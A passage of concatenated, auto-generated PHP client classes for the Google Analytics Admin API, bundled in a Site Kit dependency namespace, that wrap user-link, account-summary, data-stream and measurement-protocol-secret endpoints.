(userLinks.patch) * * @param string $name Output only. Example format: * properties/1234/userLinks/5678 * @param GoogleAnalyticsAdminV1alphaUserLink $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaUserLink */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesUserLinks::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesUserLinks'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListAccountSummariesResponse; /** * The "accountSummaries" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $accountSummaries = $analyticsadminService->accountSummaries; * </code> */ class AccountSummaries extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Returns summaries of all accounts accessible by the caller. * (accountSummaries.listAccountSummaries) * * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of AccountSummary resources to * return. The service may return fewer than this value, even if there are * additional pages. If unspecified, at most 50 resources will be returned. The * maximum value is 200; (higher values will be coerced to the maximum) * @opt_param string pageToken A page token, received from a previous * `ListAccountSummaries` call. Provide this to retrieve the subsequent page. * When paginating, all other parameters provided to `ListAccountSummaries` must * match the call that provided the page token. * @return GoogleAnalyticsAdminV1betaListAccountSummariesResponse * @throws \Google\Service\Exception */ public function listAccountSummaries($optParams = []) { $params = []; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListAccountSummariesResponse::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\AccountSummaries::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_AccountSummaries'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLinksRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListUserLinksResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "userLinks" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $userLinks = $analyticsadminService->userLinks; * </code> */ class AccountsUserLinks extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Lists all user links on an account or property, including implicit ones that * come from effective permissions granted by groups or organization admin * roles. If a returned user link does not have direct permissions, they cannot * be removed from the account or property directly with the DeleteUserLink * command. They have to be removed from the group/etc that gives them * permissions, which is currently only usable/discoverable in the GA or GMP * UIs. (userLinks.audit) * * @param string $parent Required. Example format: accounts/1234 * @param GoogleAnalyticsAdminV1alphaAuditUserLinksRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaAuditUserLinksResponse */ public function audit($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLinksRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('audit', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAuditUserLinksResponse::class); } /** * Creates information about multiple users' links to an account or property. * This method is transactional. If any UserLink cannot be created, none of the * UserLinks will be created. (userLinks.batchCreate) * * @param string $parent Required. The account or property that all user links * in the request are for. This field is required. The parent field in the * CreateUserLinkRequest messages must either be empty or match this field. * Example format: accounts/1234 * @param GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse */ public function batchCreate($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchCreate', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchCreateUserLinksResponse::class); } /** * Deletes information about multiple users' links to an account or property. * (userLinks.batchDelete) * * @param string $parent Required. The account or property that all user links * in the request are for. The parent of all values for user link names to * delete must match this field. Example format: accounts/1234 * @param GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest $postBody * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function batchDelete($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchDeleteUserLinksRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchDelete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Gets information about multiple users' links to an account or property. * (userLinks.batchGet) * * @param string $parent Required. The account or property that all user links * in the request are for. The parent of all provided values for the 'names' * field must match this field. Example format: accounts/1234 * @param array $optParams Optional parameters. * * @opt_param string names Required. The names of the user links to retrieve. A * maximum of 1000 user links can be retrieved in a batch. Format: * accounts/{accountId}/userLinks/{userLinkId} * @return GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse */ public function batchGet($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('batchGet', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchGetUserLinksResponse::class); } /** * Updates information about multiple users' links to an account or property. * (userLinks.batchUpdate) * * @param string $parent Required. The account or property that all user links * in the request are for. The parent field in the UpdateUserLinkRequest * messages must either be empty or match this field. Example format: * accounts/1234 * @param GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse */ public function batchUpdate($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksRequest $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('batchUpdate', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaBatchUpdateUserLinksResponse::class); } /** * Creates a user link on an account or property. If the user with the specified * email already has permissions on the account or property, then the user's * existing permissions will be unioned with the permissions specified in the * new UserLink. (userLinks.create) * * @param string $parent Required. Example format: accounts/1234 * @param GoogleAnalyticsAdminV1alphaUserLink $postBody * @param array $optParams Optional parameters. * * @opt_param bool notifyNewUser Optional. If set, then email the new user * notifying them that they've been granted permissions to the resource. * @return GoogleAnalyticsAdminV1alphaUserLink */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class); } /** * Deletes a user link on an account or property. (userLinks.delete) * * @param string $name Required. Example format: accounts/1234/userLinks/5678 * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Gets information about a user's link to an account or property. * (userLinks.get) * * @param string $name Required. Example format: accounts/1234/userLinks/5678 * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaUserLink */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class); } /** * Lists all user links on an account or property. * (userLinks.listAccountsUserLinks) * * @param string $parent Required. Example format: accounts/1234 * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of user links to return. The * service may return fewer than this value. If unspecified, at most 200 user * links will be returned. The maximum value is 500; values above 500 will be * coerced to 500. * @opt_param string pageToken A page token, received from a previous * `ListUserLinks` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListUserLinks` must match the * call that provided the page token. * @return GoogleAnalyticsAdminV1alphaListUserLinksResponse */ public function listAccountsUserLinks($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListUserLinksResponse::class); } /** * Updates a user link on an account or property. (userLinks.patch) * * @param string $name Output only. Example format: * properties/1234/userLinks/5678 * @param GoogleAnalyticsAdminV1alphaUserLink $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaUserLink */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaUserLink::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\AccountsUserLinks::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_AccountsUserLinks'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListWebDataStreamsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaWebDataStream; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "webDataStreams" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $webDataStreams = $analyticsadminService->webDataStreams; * </code> */ class PropertiesWebDataStreams extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a web stream with the specified location and attributes. * (webDataStreams.create) * * @param string $parent Required. The parent resource where this web data * stream will be created. Format: properties/123 * @param GoogleAnalyticsAdminV1alphaWebDataStream $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaWebDataStream */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaWebDataStream $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaWebDataStream::class); } /** * Deletes a web stream on a property. (webDataStreams.delete) * * @param string $name Required. The name of the web data stream to delete. * Format: properties/{property_id}/webDataStreams/{stream_id} Example: * "properties/123/webDataStreams/456" * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lookup for a single WebDataStream (webDataStreams.get) * * @param string $name Required. The name of the web data stream to lookup. * Format: properties/{property_id}/webDataStreams/{stream_id} Example: * "properties/123/webDataStreams/456" * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaWebDataStream */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaWebDataStream::class); } /** * Returns child web data streams under the specified parent property. Web data * streams will be excluded if the caller does not have access. Returns an empty * list if no relevant web data streams are found. * (webDataStreams.listPropertiesWebDataStreams) * * @param string $parent Required. The name of the parent property. For example, * to list results of web streams under the property with Id 123: * "properties/123" * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200; * (higher values will be coerced to the maximum) * @opt_param string pageToken A page token, received from a previous * `ListWebDataStreams` call. Provide this to retrieve the subsequent page. When * paginating, all other parameters provided to `ListWebDataStreams` must match * the call that provided the page token. * @return GoogleAnalyticsAdminV1alphaListWebDataStreamsResponse */ public function listPropertiesWebDataStreams($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListWebDataStreamsResponse::class); } /** * Updates a web stream on a property. (webDataStreams.patch) * * @param string $name Output only. Resource name of this Data Stream. Format: * properties/{property_id}/webDataStreams/{stream_id} Example: * "properties/1000/webDataStreams/2000" * @param GoogleAnalyticsAdminV1alphaWebDataStream $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Field names must be in snake case (e.g., "field_to_update"). Omitted fields * will not be updated. To replace the entire entity, use one path with the * string "*" to match all fields. * @return GoogleAnalyticsAdminV1alphaWebDataStream */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaWebDataStream $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaWebDataStream::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesWebDataStreams::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesWebDataStreams'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListMeasurementProtocolSecretsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "measurementProtocolSecrets" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $measurementProtocolSecrets = $analyticsadminService->properties_dataStreams_measurementProtocolSecrets; * </code> */ class PropertiesDataStreamsMeasurementProtocolSecrets extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a measurement protocol secret. (measurementProtocolSecrets.create) * * @param string $parent Required. The parent resource where this secret will be * created. Format: properties/{property}/dataStreams/{dataStream} * @param GoogleAnalyticsAdminV1betaMeasurementProtocolSecret $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaMeasurementProtocolSecret * @throws \Google\Service\Exception */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret::class); } /** * Deletes target MeasurementProtocolSecret. (measurementProtocolSecrets.delete) * * @param string $name Required. The name of the MeasurementProtocolSecret to * delete. Format: properties/{property}/dataStreams/{dataStream}/measurementPro * tocolSecrets/{measurementProtocolSecret} * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty * @throws \Google\Service\Exception */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lookup for a single "GA4" MeasurementProtocolSecret. * (measurementProtocolSecrets.get) * * @param string $name Required. The name of the measurement protocol secret to * lookup. Format: properties/{property}/dataStreams/{dataStream}/measurementPro * tocolSecrets/{measurementProtocolSecret} * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1betaMeasurementProtocolSecret * @throws \Google\Service\Exception */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret::class); } /** * Returns child MeasurementProtocolSecrets under the specified parent Property. * (measurementProtocolSecrets.listPropertiesDataStreamsMeasurementProtocolSecre * ts) * * @param string $parent Required. The resource name of the parent stream. * Format: * properties/{property}/dataStreams/{dataStream}/measurementProtocolSecrets * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 10 resources will be returned. The maximum value is 10. * Higher values will be coerced to the maximum. * @opt_param string pageToken A page token, received from a previous * `ListMeasurementProtocolSecrets` call. Provide this to retrieve the * subsequent page. When paginating, all other parameters provided to * `ListMeasurementProtocolSecrets` must match the call that provided the page * token. * @return GoogleAnalyticsAdminV1betaListMeasurementProtocolSecretsResponse * @throws \Google\Service\Exception */ public function listPropertiesDataStreamsMeasurementProtocolSecrets($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaListMeasurementProtocolSecretsResponse::class); } /** * Updates a measurement protocol secret. (measurementProtocolSecrets.patch) * * @param string $name Output only. Resource name of this secret. This secret * may be a child of any type of stream. Format: properties/{property}/dataStrea * ms/{dataStream}/measurementProtocolSecrets/{measurementProtocolSecret} * @param GoogleAnalyticsAdminV1betaMeasurementProtocolSecret $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Omitted fields will not be updated. * @return GoogleAnalyticsAdminV1betaMeasurementProtocolSecret * @throws \Google\Service\Exception */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1betaMeasurementProtocolSecret::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesDataStreamsMeasurementProtocolSecrets::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesDataStreamsMeasurementProtocolSecrets'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAndroidAppDataStream; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListAndroidAppDataStreamsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "androidAppDataStreams" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $androidAppDataStreams = $analyticsadminService->androidAppDataStreams; * </code> */ class PropertiesAndroidAppDataStreams extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Deletes an android app stream on a property. (androidAppDataStreams.delete) * * @param string $name Required. The name of the android app data stream to * delete. Format: properties/{property_id}/androidAppDataStreams/{stream_id} * Example: "properties/123/androidAppDataStreams/456" * @param array $optParams Optional parameters. * @return GoogleProtobufEmpty */ public function delete($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('delete', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty::class); } /** * Lookup for a single AndroidAppDataStream (androidAppDataStreams.get) * * @param string $name Required. The name of the android app data stream to * lookup. Format: properties/{property_id}/androidAppDataStreams/{stream_id} * Example: "properties/123/androidAppDataStreams/456" * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaAndroidAppDataStream */ public function get($name, $optParams = []) { $params = ['name' => $name]; $params = \array_merge($params, $optParams); return $this->call('get', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAndroidAppDataStream::class); } /** * Returns child android app streams under the specified parent property. * Android app streams will be excluded if the caller does not have access. * Returns an empty list if no relevant android app streams are found. * (androidAppDataStreams.listPropertiesAndroidAppDataStreams) * * @param string $parent Required. The name of the parent property. For example, * to limit results to app streams under the property with Id 123: * "properties/123" * @param array $optParams Optional parameters. * * @opt_param int pageSize The maximum number of resources to return. If * unspecified, at most 50 resources will be returned. The maximum value is 200; * (higher values will be coerced to the maximum) * @opt_param string pageToken A page token, received from a previous call. * Provide this to retrieve the subsequent page. When paginating, all other * parameters provided to `ListAndroidAppDataStreams` must match the call that * provided the page token. * @return GoogleAnalyticsAdminV1alphaListAndroidAppDataStreamsResponse */ public function listPropertiesAndroidAppDataStreams($parent, $optParams = []) { $params = ['parent' => $parent]; $params = \array_merge($params, $optParams); return $this->call('list', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListAndroidAppDataStreamsResponse::class); } /** * Updates an android app stream on a property. (androidAppDataStreams.patch) * * @param string $name Output only. Resource name of this Data Stream. Format: * properties/{property_id}/androidAppDataStreams/{stream_id} Example: * "properties/1000/androidAppDataStreams/2000" * @param GoogleAnalyticsAdminV1alphaAndroidAppDataStream $postBody * @param array $optParams Optional parameters. * * @opt_param string updateMask Required. The list of fields to be updated. * Field names must be in snake case (e.g., "field_to_update"). Omitted fields * will not be updated. To replace the entire entity, use one path with the * string "*" to match all fields. * @return GoogleAnalyticsAdminV1alphaAndroidAppDataStream */ public function patch($name, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAndroidAppDataStream $postBody, $optParams = []) { $params = ['name' => $name, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('patch', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaAndroidAppDataStream::class); } } // Adding a class alias for backwards compatibility with the previous class name. \class_alias(\Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource\PropertiesAndroidAppDataStreams::class, 'Google\\Site_Kit_Dependencies\\Google_Service_GoogleAnalyticsAdmin_Resource_PropertiesAndroidAppDataStreams'); <?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ namespace Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\Resource; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaListMeasurementProtocolSecretsResponse; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret; use Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleProtobufEmpty; /** * The "measurementProtocolSecrets" collection of methods. * Typical usage is: * <code> * $analyticsadminService = new Google\Service\GoogleAnalyticsAdmin(...); * $measurementProtocolSecrets = $analyticsadminService->measurementProtocolSecrets; * </code> */ class PropertiesAndroidAppDataStreamsMeasurementProtocolSecrets extends \Google\Site_Kit_Dependencies\Google\Service\Resource { /** * Creates a measurement protocol secret. (measurementProtocolSecrets.create) * * @param string $parent Required. The parent resource where this secret will be * created. Any type of stream (WebDataStream, IosAppDataStream, * AndroidAppDataStream) may be a parent. Format: * properties/{property}/webDataStreams/{webDataStream} * @param GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody * @param array $optParams Optional parameters. * @return GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret */ public function create($parent, \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret $postBody, $optParams = []) { $params = ['parent' => $parent, 'postBody' => $postBody]; $params = \array_merge($params, $optParams); return $this->call('create', [$params], \Google\Site_Kit_Dependencies\Google\Service\GoogleAnalyticsAdmin\GoogleAnalyticsAdminV1alphaMeasurementProtocolSecret::class); } /** * Deletes target MeasurementProtocolSecret. (measurementProtocolSecrets.delete) * * @param string $name Required. The name of the MeasurementProtocolSecret to * delete. Format: properties/{property}/webDataStreams/{webDataStream}/measurem * entProtocolSecrets/{measurementProtocolSecret} Note: Any type of stream * (WebDataStream, IosAppDataStream, AndroidAppDataStream) may be a parent. * @param array $optParams Optional parameters. * 